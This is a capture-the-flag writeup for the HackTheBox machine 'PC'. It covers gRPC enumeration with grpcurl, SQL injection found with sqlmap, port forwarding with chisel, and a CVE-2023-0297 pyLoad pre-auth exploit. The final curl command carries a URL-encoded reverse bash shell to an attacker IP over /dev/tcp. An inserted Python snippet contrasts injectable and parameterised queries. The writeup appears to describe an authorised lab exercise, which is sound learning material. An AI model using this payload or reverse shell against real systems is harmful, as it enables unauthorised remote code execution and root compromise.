CTF-Writeups/HackTheBox/PC.md
2023-10-08 14:22:39 +05:00

HackTheBox - PC

NMAP

Nmap scan report for 10.129.19.240
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)
|   256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_  256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open  unknown

PORT 50051

Connecting to this port through telnet or netcat doesn't yield anything but `???`

Researching what runs on port 50051 shows that it is the default port of gRPC, an open source remote procedure call framework by Google.

We can analyze the traffic in Wireshark by sniffing packets on our interface (tun0) and decoding the stream as HTTP/2, which gRPC runs over.

gRPC services can be enumerated with grpcurl:

grpcurl -plaintext 10.129.19.240:50051 list

This lists two services; let's list the methods of SimpleApp.

The SimpleApp service has three methods, which can be inspected with the `describe` argument.

We can register an account and log in with it; the login response returns an id.

grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/RegisterUser 

grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/LoginUser

Calling getInfo now asks for a token.

Foothold

If we go back to the LoginUser method and enable verbosity with -vv, we see that the response also includes a token.

grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" 10.129.19.240:50051 SimpleApp/getInfo

This gives us the error `Unexpected : bad argument type for built-in operation` because we haven't specified the request data. Using `describe` shows what parameters the method accepts.

It needs the ID which we get after logging in:

grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" -d '{"id": "842"}' 10.129.19.240:50051 SimpleApp/getInfo

But tampering/playing around with this was a little difficult, so I tried Postman and grpcui, which give you a GUI to work with the gRPC service and also intercept the requests easily.

After identifying that it was using some filters for SQLi, we can try running sqlmap, which found an injection in the id parameter.
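To show why the `id` parameter of getInfo was injectable and what the fix looks like, here is an added illustration (not the box's real server code, which the writeup does not show): a lookup that splices the id into the SQL text beside one that binds it as a parameter, run against a constructed in-memory table.

```python
import sqlite3

# Constructed sample rows and schema standing in for the app's database
# (hypothetical; the real SimpleApp service is not shown in the writeup).
ROWS = [("842", "arz101", "user"), ("1", "admin", "admin")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id TEXT, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ROWS)
    return conn


def get_info_vulnerable(conn, user_id):
    # The caller's id becomes part of the SQL text, so the `id` field is
    # injectable; this is the class of bug sqlmap reported on the service.
    query = f"SELECT username, role FROM accounts WHERE id = '{user_id}'"
    return conn.execute(query).fetchall()


def get_info_hardened(conn, user_id):
    # Parameterised query: the id is bound as data and never parsed as SQL.
    # Ids handed out at registration are numeric, so anything else is
    # rejected up front as a cheap second layer.
    if not user_id.isdigit():
        return []
    query = "SELECT username, role FROM accounts WHERE id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def demo():
    # Regression check a maintainer would keep: a tautology probe must not
    # widen the result set. Only the concatenating version leaks extra rows.
    conn = make_db()
    probe = "842' OR '1'='1"
    return {
        "normal_vuln": get_info_vulnerable(conn, "842"),
        "normal_safe": get_info_hardened(conn, "842"),
        "probe_vuln": get_info_vulnerable(conn, probe),
        "probe_safe": get_info_hardened(conn, probe),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```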

With these credentials, we can log in as the sau user.

Enumerating the SUID binaries and the files owned by sau yields no path to escalation. Checking the local ports, port 8000 is open and redirects to a login page.

Port forwarding with chisel

chisel server -p 3333 --reverse

chisel client 10.10.16.19:3333 R:localhost:8000

Accessing the forwarded port in our browser, we get the login page of pyLoad, a download manager written in Python.

Trying default creds like admin:admin and pyload:pyload didn't work, so searching for CVEs turned up a pre-auth RCE vulnerability (CVE-2023-0297).

Using the PoC, we get a shell as the root user:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E19%2F2222%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://localhost:8000/flash/addcrypted2'

References